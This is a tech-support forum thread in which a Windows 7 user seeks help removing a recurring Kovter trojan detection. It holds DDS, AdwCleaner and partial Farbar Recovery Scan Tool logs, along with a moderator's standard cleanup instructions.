MSE finds trojan every time

Old 08-08-2015, 01:29 PM   #1
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hey there,

I ran a "quick scan" with Microsoft Security Essentials, and it found a trojan (Win32/Kovter.C!reg). It removes it apparently successfully, but upon scanning again it will find exactly the same trojan. I ran dds, what should I do now?

MSE screencap:



DDS.txt:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17909 BrowserJavaVersion: 11.31.2
Run by Mom at 21:10:07 on 2015-08-08
Microsoft Windows 7 Professional 6.1.7601.1.1252.44.1033.18.3894.2105 [GMT 1:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\Explorer.EXE
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\GWX\GWX.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\system32\taskhost.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
mWinlogon: Userinit = userinit.exe
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [Search Protection] C:\ProgramData\Search Protection\SearchProtection.exe
dRunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"https://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
StartupFolder: C:\Users\Mom\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\MONITO~1.LNK - C:\Windows\System32\RunDll32.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: NameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{394329BF-2D3B-4468-A7DD-AF1FAB398EDA} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF} : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\463766D25313430353 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\6796277696E6D65646961613239333931373 : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\E4544574541425 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}\E474237657563747 : DHCPNameServer = 10.64.8.254
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
SSODL: WebCheck - <orphaned>
STS: Windows DreamScene - {E31004D1-A431-41B8-826F-E902F9D95C81} -
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.130\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\csjr5mn3.default\
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1211151.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R1 MpKsl958ccaaf;MpKsl958ccaaf;C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [2015-8-8 44928]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-14 27136]
R3 HECIx64;Intel(R) Management Engine Interface;C:\Windows\System32\drivers\HECIx64.sys [2009-9-17 56344]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2009-3-1 187392]
R3 rtl8192se;Realtek Wireless LAN 802.11n PCI-E NIC NT Driver;C:\Windows\System32\drivers\rtl8192se.sys [2011-6-20 1225832]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-12 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-6-25 327296]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-7-15 114688]
S3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2014-3-11 124568]
S3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-4-30 366544]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2014-6-1 19456]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-14 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-6-1 56832]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2014-5-24 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2015-1-27 14464]
S4 LULU Software CrashHandler;LULU Software CrashHandler;"C:\Program Files (x86)\Soda PDF 6\crash-handler-ws.exe" --> C:\Program Files (x86)\Soda PDF 6\crash-handler-ws.exe [?]
S4 Soda PDF 6;Soda PDF 6;"C:\Program Files (x86)\Soda PDF 6\ws.exe" --> C:\Program Files (x86)\Soda PDF 6\ws.exe [?]
.
=============== Created Last 30 ================
.
2015-08-08 19:30:33 75888 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\offreg.836.dll
2015-08-08 19:30:31 44928 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys
2015-08-08 06:02:58 1190000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{2E39BF95-F2CC-4DA7-9A64-2CE1E2E3F167}\gapaengine.dll
2015-08-08 06:00:48 12222168 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\mpengine.dll
2015-08-07 06:13:17 12222168 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-07-28 07:46:34 726528 ----a-w- C:\Windows\System32\generaltel.dll
2015-07-28 07:46:33 765440 ----a-w- C:\Windows\System32\invagent.dll
2015-07-28 07:46:33 67584 ----a-w- C:\Windows\System32\acmigration.dll
2015-07-28 07:46:33 433664 ----a-w- C:\Windows\System32\devinv.dll
2015-07-28 07:46:33 1145856 ----a-w- C:\Windows\System32\aeinv.dll
2015-07-28 07:46:33 1085440 ----a-w- C:\Windows\System32\appraiser.dll
2015-07-28 07:46:30 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-07-28 07:46:30 17856 ----a-w- C:\Windows\System32\CompatTelRunner.exe
2015-07-21 15:53:31 -------- d-----r- C:\Program Files (x86)\Skype
2015-07-21 06:48:26 41984 ----a-w- C:\Windows\System32\lpk.dll
2015-07-21 06:48:26 372224 ----a-w- C:\Windows\System32\atmfd.dll
2015-07-21 06:48:26 299008 ----a-w- C:\Windows\SysWow64\atmfd.dll
2015-07-21 06:48:25 70656 ----a-w- C:\Windows\SysWow64\fontsub.dll
2015-07-21 06:48:25 46080 ----a-w- C:\Windows\System32\atmlib.dll
2015-07-21 06:48:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2015-07-21 06:48:25 25600 ----a-w- C:\Windows\SysWow64\lpk.dll
2015-07-21 06:48:25 14336 ----a-w- C:\Windows\System32\dciman32.dll
2015-07-21 06:48:25 10240 ----a-w- C:\Windows\SysWow64\dciman32.dll
2015-07-21 06:48:25 100864 ----a-w- C:\Windows\System32\fontsub.dll
2015-07-15 08:22:56 2427392 ----a-w- C:\Windows\System32\wininet.dll
2015-07-15 08:21:54 3242496 ----a-w- C:\Windows\System32\msi.dll
2015-07-15 08:21:54 1941504 ----a-w- C:\Windows\System32\authui.dll
2015-07-15 08:21:53 73216 ----a-w- C:\Windows\SysWow64\msiexec.exe
2015-07-15 08:21:53 2364416 ----a-w- C:\Windows\SysWow64\msi.dll
2015-07-15 08:21:53 1805824 ----a-w- C:\Windows\SysWow64\authui.dll
2015-07-15 08:21:53 128000 ----a-w- C:\Windows\System32\msiexec.exe
2015-07-15 08:21:53 112064 ----a-w- C:\Windows\System32\consent.exe
2015-07-15 08:21:52 70656 ----a-w- C:\Windows\System32\appinfo.dll
2015-07-15 08:21:52 504320 ----a-w- C:\Windows\System32\msihnd.dll
2015-07-15 08:21:52 337408 ----a-w- C:\Windows\SysWow64\msihnd.dll
2015-07-15 08:21:52 25088 ----a-w- C:\Windows\SysWow64\msimsg.dll
2015-07-15 08:21:52 25088 ----a-w- C:\Windows\System32\msimsg.dll
2015-07-10 13:39:12 -------- d--h--w- C:\$Windows.~BT
.
==================== Find3M ====================
.
2015-07-15 17:41:49 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-07-15 17:41:48 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-09 17:58:56 192000 ----a-w- C:\Windows\System32\wuwebv.dll
2015-07-09 17:58:55 98304 ----a-w- C:\Windows\System32\wudriver.dll
2015-07-09 17:58:55 3154944 ----a-w- C:\Windows\System32\wucltux.dll
2015-07-09 17:58:34 91136 ----a-w- C:\Windows\System32\WinSetupUI.dll
2015-07-09 17:58:25 12288 ----a-w- C:\Windows\System32\wu.upgrade.ps.dll
2015-07-09 17:58:20 37376 ----a-w- C:\Windows\System32\wuapp.exe
2015-07-09 17:43:25 93184 ----a-w- C:\Windows\SysWow64\wudriver.dll
2015-07-09 17:43:25 173056 ----a-w- C:\Windows\SysWow64\wuwebv.dll
2015-07-09 17:42:47 34816 ----a-w- C:\Windows\SysWow64\wuapp.exe
2015-07-05 10:08:23 300704 ------w- C:\Windows\System32\MpSigStub.exe
2015-07-04 18:07:11 2087424 ----a-w- C:\Windows\System32\ole32.dll
2015-07-04 17:48:36 1414656 ----a-w- C:\Windows\SysWow64\ole32.dll
2015-07-02 21:08:53 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-07-02 20:40:34 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-07-01 20:56:03 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-07-01 20:56:03 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-07-01 20:49:53 210944 ----a-w- C:\Windows\System32\wdigest.dll
2015-07-01 20:49:47 86528 ----a-w- C:\Windows\System32\TSpkg.dll
2015-07-01 20:49:45 29184 ----a-w- C:\Windows\System32\sspisrv.dll
2015-07-01 20:49:45 136192 ----a-w- C:\Windows\System32\sspicli.dll
2015-07-01 20:49:42 342016 ----a-w- C:\Windows\System32\schannel.dll
2015-07-01 20:49:42 28160 ----a-w- C:\Windows\System32\secur32.dll
2015-07-01 20:49:41 1216512 ----a-w- C:\Windows\System32\rpcrt4.dll
2015-07-01 20:49:23 309760 ----a-w- C:\Windows\System32\ncrypt.dll
2015-07-01 20:49:22 315392 ----a-w- C:\Windows\System32\msv1_0.dll
2015-07-01 20:49:11 729088 ----a-w- C:\Windows\System32\kerberos.dll
2015-07-01 20:49:11 1461760 ----a-w- C:\Windows\System32\lsasrv.dll
2015-07-01 20:48:34 44032 ----a-w- C:\Windows\System32\cryptbase.dll
2015-07-01 20:48:34 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-07-01 20:47:38 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-07-01 20:47:18 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-07-01 20:43:51 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-07-01 20:43:37 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-07-01 20:39:24 686080 ----a-w- C:\Windows\System32\adtschema.dll
2015-07-01 20:30:43 172032 ----a-w- C:\Windows\SysWow64\wdigest.dll
2015-07-01 20:30:40 65536 ----a-w- C:\Windows\SysWow64\TSpkg.dll
2015-07-01 20:30:37 248832 ----a-w- C:\Windows\SysWow64\schannel.dll
2015-07-01 20:30:37 22016 ----a-w- C:\Windows\SysWow64\secur32.dll
2015-07-01 20:30:33 221184 ----a-w- C:\Windows\SysWow64\ncrypt.dll
2015-07-01 20:30:32 259584 ----a-w- C:\Windows\SysWow64\msv1_0.dll
2015-07-01 20:30:27 552960 ----a-w- C:\Windows\SysWow64\kerberos.dll
2015-07-01 20:30:21 36864 ----a-w- C:\Windows\SysWow64\cryptbase.dll
2015-07-01 20:30:21 17408 ----a-w- C:\Windows\SysWow64\credssp.dll
2015-07-01 20:29:46 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-07-01 20:29:34 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-07-01 20:29:34 665088 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2015-07-01 20:27:04 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-07-01 20:26:52 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-07-01 20:24:59 686080 ----a-w- C:\Windows\SysWow64\adtschema.dll
2015-07-01 19:27:34 159232 ----a-w- C:\Windows\System32\drivers\mrxsmb.sys
2015-07-01 19:26:43 290816 ----a-w- C:\Windows\System32\drivers\mrxsmb10.sys
2015-07-01 19:26:37 129024 ----a-w- C:\Windows\System32\drivers\mrxsmb20.sys
2015-06-27 02:47:11 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-06-27 02:43:26 5923840 ----a-w- C:\Windows\System32\jscript9.dll
2015-06-27 01:58:17 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-06-27 01:39:37 4520448 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-06-25 08:57:44 3207168 ----a-w- C:\Windows\System32\win32k.sys
2015-06-24 00:29:00 1217192 ----a-w- C:\Windows\SysWow64\FM20.DLL
2015-06-20 2050 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-06-20 19:50:10 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-06-20 19:49:17 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-06-20 19:49:09 417792 ----a-w- C:\Windows\System32\html.iec
2015-06-20 19:49:08 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-06-20 19:48:29 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-06-20 19:34:46 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-06-20 19:34:45 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-06-20 19:25:28 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-06-20 19:13:07 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-06-20 18:46:53 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-06-20 18:46:48 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-06-19 18:25:41 504320 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-06-19 18:25:35 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-06-19 18:24:43 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-06-19 18:24:27 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-06-19 18:23:26 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-06-19 18:13:10 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-06-19 17:57:45 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-06-19 17:40:04 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-06-19 17:39:13 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-06-19 17:15:43 1951232 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-06-17 17:47:05 404992 ----a-w- C:\Windows\System32\gdi32.dll
2015-06-17 17:37:03 312320 ----a-w- C:\Windows\SysWow64\gdi32.dll
2015-06-11 17:57:36 53248 ----a-w- C:\Windows\SysWow64\tsgqec.dll
2015-06-11 17:57:35 856064 ----a-w- C:\Windows\SysWow64\rdvidcrl.dll
2015-06-11 17:57:35 6131200 ----a-w- C:\Windows\SysWow64\mstscax.dll
2015-06-11 17:56:55 7077376 ----a-w- C:\Windows\System32\mstscax.dll
2015-06-11 17:56:55 62976 ----a-w- C:\Windows\System32\tsgqec.dll
2015-06-11 17:56:55 1057792 ----a-w- C:\Windows\System32\rdvidcrl.dll
2015-06-11 13:15:53 429568 ----a-w- C:\Windows\System32\wksprt.exe
2015-06-09 18:03:22 3180544 ----a-w- C:\Windows\System32\rdpcorets.dll
2015-06-09 18:03:22 16384 ----a-w- C:\Windows\System32\RdpGroupPolicyExtension.dll
2015-06-02 00:07:15 254976 ----a-w- C:\Windows\System32\cewmdm.dll
2015-06-01 23:47:09 210432 ----a-w- C:\Windows\SysWow64\cewmdm.dll
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:19:27 362496 ----a-w- C:\Windows\System32\wow64win.dll
2015-05-25 18:19:27 243712 ----a-w- C:\Windows\System32\wow64.dll
2015-05-25 18:19:27 13312 ----a-w- C:\Windows\System32\wow64cpu.dll
.
============= FINISH: 21:11:53.43 ===============
Attached Files
File Type: txt attach.txt (12.3 KB, 27 views)
kkollage is offline  
Old 08-10-2015, 06:53 PM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.

Emergency Backup Procedure - Tech Support Forum

Also, if you haven't done so already, create a system repair disc. It's really easy and quick.

How To Create a Windows 7 System Repair Disc [Easy]

------------------------------------------------------

*Note - Do NOT upgrade your OS to Windows 10 until your machine is clean, and we have uninstalled all our removal tools. Thanks.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Do NOT click the green 'Download' button (if visible).
  • Click the blue 'Download now @bleepingcomputer' button.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Cleaning
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[S#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click FRST64 to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 08-11-2015, 01:13 PM   #3
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi
How do I subscribe to this thread? I am ready to follow directions for the fix. Thanks (doing backup now) OK done...
Ahh. I see the next step is to create a system repair disc. I have a 4 disc set of ''product recovery'' - is that the same thing?
kkollage is offline  
Old 08-11-2015, 03:27 PM   #4
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



# AdwCleaner v4.208 - Logfile created 11/08/2015 at 23:02:07
# Updated 09/07/2015 by Xplode
# Database : 2015-08-11.1 [Server]
# Operating system : Windows 7 Professional Service Pack 1 (x64)
# Username : Mom - SAVAGE
# Running from : C:\Users\Mom\Downloads\AdwCleaner.exe
# Option : Cleaning

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Scheduled tasks ] *****








***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\oejkcgajlodefenbbjdnaiahmbnnoole
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Search Protection]
Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Toolbar Cleaner

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17909


-\\ Mozilla Firefox v39.0 (x86 en-GB)


-\\ Google Chrome v44.0.2403.130


*************************

AdwCleaner[R0].txt - [1157 bytes] - [11/08/2015 22:53:15]
AdwCleaner[S0].txt - [1086 bytes] - [11/08/2015 23:02:07]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1145 bytes] ##########

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:11-08-2015 02
Ran by Mom (administrator) on SAVAGE (11-08-2015 23:13:18)
Running from C:\Users\Mom\Downloads
Loaded Profiles: Mom (Available Profiles: Mom)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
